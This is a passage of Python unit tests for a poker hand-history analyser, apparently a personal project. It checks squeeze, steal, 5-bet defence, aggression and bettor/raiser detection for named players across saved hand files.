# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
file = '__P__FOCRFFRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz(), msg=file + ' ' + player)
file = '__P__FOCCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
file = '__P__LIFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
file = '__P__LICFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
file = '__P__LICRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz(), msg=file + ' ' + player)
def test_sqz_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
file = '__P__LICRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
file = '__P__LICRFFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
file = '__P__LICRFFCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
def test_enum_sqz_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
file = '__P__FOCRFFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual('4bet', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
file = '__P__LICRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
file = '__P__LICRFFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual('4bet', tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
file = '__P__LICRFFCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
def test_steal_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFFOF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
file = '__P__FFLFIFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
def test_steal(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFFOF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
file = '__P__FFLFIFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
def test_steal_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFOFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
file = '__P__FFFOFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
file = '__P__FOFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
def test_enum_steal_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFOFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
file = '__P__FFFOFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual('3bet', tmp.enum_steal_def(), msg=file + ' ' + player)
file = '__P__FOFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
def test_five_bet_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
def test_enum_five_bet_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
file = '__P__FOCRFFRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('call 5bet', tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
file = '__P__FOCRFFRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('6bet', tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_five_bet_def(),
msg=file + ' ' + player)
class TestAggression(unittest.TestCase):
def test_call(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'fidas1972'
tmp = Aggression(hand, street, player)
self.assertEqual(-1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr2r__F__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__XXBRCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
def test_aggr(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'fidas1972'
tmp = Aggression(hand, street, player)
self.assertEqual(-1, tmp.aggr(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr2r__F__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__XXBRCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
class TestBet(unittest.TestCase):
def test_better(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
def test_raiser(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('kr123445', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.raiser,
msg=file + ' ' + street + ' ' + player)
file = 'r1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.raiser,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
